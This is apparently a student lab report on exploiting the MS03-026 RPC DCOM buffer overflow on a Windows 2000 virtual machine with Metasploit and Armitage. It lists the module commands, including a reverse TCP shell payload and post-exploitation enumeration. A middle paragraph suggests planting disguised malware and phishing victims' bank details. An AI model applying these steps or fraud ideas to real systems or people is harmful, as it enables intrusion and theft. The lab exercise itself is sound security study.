Professional Documents
Culture Documents
Front matter:
My Exploit CVE-2003-0352 Microsoft RPC DCOM Interface Overflow (Metasploit exploit:
exploit/windows/dcerpc/ms03_026_dcom)
word count- “2114”
Introduction:
To begin my report I will firstly note the attack software in which I used was “Kali Linux”,
which allowed me to use all the different tools and utilities to carry out my attack. Kali Linux
is a large piece of software which has countless installed penetrable programs already
installed on it. These pre-installed programmes are the ones which are needed to use to carry
out my exploit on the windows 2000 virtual machine. [1]. The way in which I used kali Linux
was through a virtual machine ‘Oracle’ which allowed me to download the Vm’s needed to
do the exploit. The Vulnerability which I used allowed me to stack buffer overflow in the
RPCSS service, the vulnerability was formed by the ‘Last Stage of Delirium research group’
which has caused it to be widely exploited ever since.[2]
Anatomy of an attack:
Step 1 & 2
To begin this attack I loaded up my kali Linux on my oracle platform and loaded up
metasploit framework to begin my exploit. Once completing this I then did the command ‘use
exploit’ and typed the exploit in which I wanted to use into kali Linux, which was ‘use
exploit/windows/dcerpc/ms03_026_dcom’. Step 2 of this is then to show the Options of the
exploit chosen to see what the current state of the hosts are set as. This allows me to then see
what I need to change, such as the rhost and the lhost, the rhost needs to be linked with the
windows 2k vm, and the lhost is the ip address which is on the kali linux operating system.
Step 3
Step 3 Is to set the RHOST IP Address to the win 2K server which is collected through a tool
in kali Linux called Nmap, this allowed me to collect the IP addresses of my opened VM’s, to
prove I have got the ip address through the tool you can compare it to the photo where I
‘ipconfig’ on the cmd on windows 2k. Nmap is a tool which allowed me to ‘scan’ across the
network to see what was being used. This allowed me to then pick up the ip address from
the windows 2k vm.
Step 4
Step 4 is to then set the ‘PAYLOAD windows/shell/reverse_tcp’ this causes the machine to
communicate back to the attacking machine.
Step 5
Step 5 is to then set the LHOST which is the kali Linux ip address which is collected by
opening a new terminal and using the command ‘ifconfig’
Step 6
Step 6 is to run the exploit by typing the command ‘exploit’ this should successfully launch
the attack and you should now have administrator access to the remote system. I can now
exploit the vulnerabilities due to the ports being opened on this windows 2000 server, when
specific ports are open, it allows you to create a program that could communicate with a
vulnerable server over an affected TCP/UDP port to send a specific kind of malformed RPC
message[3]
Step 7
Step 7 is to use the command dir C:\which lists all the files and directories in the C:\
directory.
Step 8
Step 8 is to run the command net user to allows you to see all the user accounts on the
machine. This proves I have successfully done the exploit because the command net user
and dirC:/ wouldn’t work on a Linux, as it Is a windows command.
The malicious actions possible after doing this exploit is that I could gain access to the files
on the win2k system by searching in the directory of the C drive and downloading it,
another thing that I could do is upload a file of my choice onto their computer, this could be
an infected file and could then damage their computer if opened, a way of doing this is by
making a shortcut of a main used application such as internet explorer, which people often
use, once the person then clicks on the file they have activated the malware and causes the
computer to be infected, another way in which the exploit could be carried out even further
is by shortcutting a file with ‘bank details needed’ on it so the person fills their bank details
into a form, which I would have created myself to which you could then retrieve and
download yourself causing you to find out their personal bank details. The limitations are
that I can’t fully infect the computer due to me not being able to choose what’s being
opened on their computer, as people may be more experienced with their knowledge in
malware and choose not to open a suspicious application. A way to maintain access over my
tracks is if something is done by accident it is possible to search through the files and check
what was inputted by accident and removing it.
Step 9
By doing the next couple of steps I just was making sure the exploit worked as it is a more
basic way to run the exploit using Armitage as it requires less commands to be made and
the attack button and exploit is ready to be activated through selection.
Step 9 is to the run Armitage to start the Metasploit RPC server on the kali Linux software
and add the IP address of the win 2k server to then be able to connect. Then I did a quick
scan (OS detect) which allowed me to successfully link it to the win 2k server VM. From here
forward I right clicked on the Windows logo to then attack the VM through the
ms03_026_dcom (dcerpc), I then clicked Launch. To show that the attack has worked the
windows screen turns red.
Step 10
Step 10
As listed above I’m adding it to this step, by running the command shell you are able to run
the commands as I did on msf, and list the directories and the net user of the win 2k server,
as mentioned above this is a windows command and wouldn’t be able to done usually on a
linux system.
Related software
A piece of software which I used within the exploit I did was kali linux, which then allowed
me to use a tool within the software called ‘Nmap’ this allowed me to check for the open
ports, and allowed me to retrieve the ip address from my other windows 2000 VM, in sense
this will allow you to scan for ports being opened on other servers. Nmap is naturally a
utility tool for checking to see if ports are opened or closed, but through the command I
used of nmap, it showed the other Vms ip addresses. Relating to Nmap, there are
alternatives we can use to guarantee the ports we are checking are open. As we do the
nmap scan we can check what ports are open, however lets say we want to double check,
it’s a good idea to use a different tool such as arp-scan which offers the same features as
nmap so we could’ve use that to carry out the exploit as well. Another piece of software
that could have been used to do my exploit was Parrot Os’, which is an alternative software
like ‘Kali Linux’ with all pre installed programmes and tools. For my self ease I used ‘kali
Linux’ as I’ve used it many times before and know it can carry out an attack, however ‘Parrot
Os’ is that similar I could’ve used that too, as it could have used Nmap, Armitage etc.
Conclusion
My conclusion to this report is that the exploits which can be done in our society are always
upgrading as well as our security, however it always seems like the exploits are a step ahead
because once the exploits been done, the flaws which have been exploited then need to be
changed so it cant happen again. The security levels have increased dramatically as it needs
to be as well, comparing it to back when computers first came out and how vulnerable they
were. These days it seems a thing on computers to always have security measures on
computers such as the likes of the software of “MacAfee etc.’ The summary of my attack in
general was that it was a straight forward attack which allowed me to a stack buffer
overflow in the RPCSS service. This was using the main pieces of software of kali Linux, and
Oracle to host my Vms.
References
{Bibliography}[1] “Kali Linux,” Wikipedia. 23-Nov-2017.
[2] Metasploit, “Exploit.” [Online]. Available: https://www.exploit-
db.com/exploits/16749/. [Accessed: 26-Nov-2017].
[3] BetaFred, “Microsoft Security Bulletin MS03-026 - Critical.” [Online].
Available: https://docs.microsoft.com/en-us/security-
updates/securitybulletins/2003/ms03-026. [Accessed: 24-Nov-2017].